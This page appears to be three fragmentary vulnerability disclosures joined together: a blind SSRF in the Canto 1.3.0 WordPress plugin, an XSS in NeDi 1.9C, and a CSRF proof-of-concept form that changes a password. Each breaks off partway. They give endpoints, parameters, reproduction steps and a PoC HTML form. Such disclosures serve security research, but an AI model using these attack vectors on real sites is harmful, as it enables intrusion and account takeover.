This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Wordpress Plugin Canto 1.3.0 - Blind SSRF Vulnerability | |
## Multiple Server-Side Request Forgery Vulnerabilities found in Canto 1.3.0 version. | |
**Description:-** | |
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerability. | |
It allows an unauthenticated attacker can make a request to any Internal and External Server via /includes/lib/detail.php?subdomain=SSRF. | |
**Steps To Reproduce:-** | |
1. Start a Netcat Listener on port 4499. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Multiple Cross-Site Script Vulnerabilities found in NeDi 1.9C version. | |
Description:- | |
NeDi 1.9C is vulnerable to a cross-site scripting (XSS) attack. | |
The application allows an attacker to execute arbitrary JavaScript code via the "Topology-Map.php" page on "xo" parameter. | |
Steps To Reproduce:- | |
1. Login to the Application. | |
2. Go to "https://ip/Topology-Map.php" page. | |
3. Add 'xo' parameter at the end of the URL. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<!-- CSRF PoC - generated by Burp Suite Professional --> | |
<body> | |
<script>history.pushState('', '', '/')</script> | |
<form action="https://target.com" method="POST"> | |
<input type="hidden" name="password" value="12345" /> | |
<input type="hidden" name="confirm_password" value="12345" /> | |
<input type="submit" value="Submit request" /> | |
</form> | |
<script> |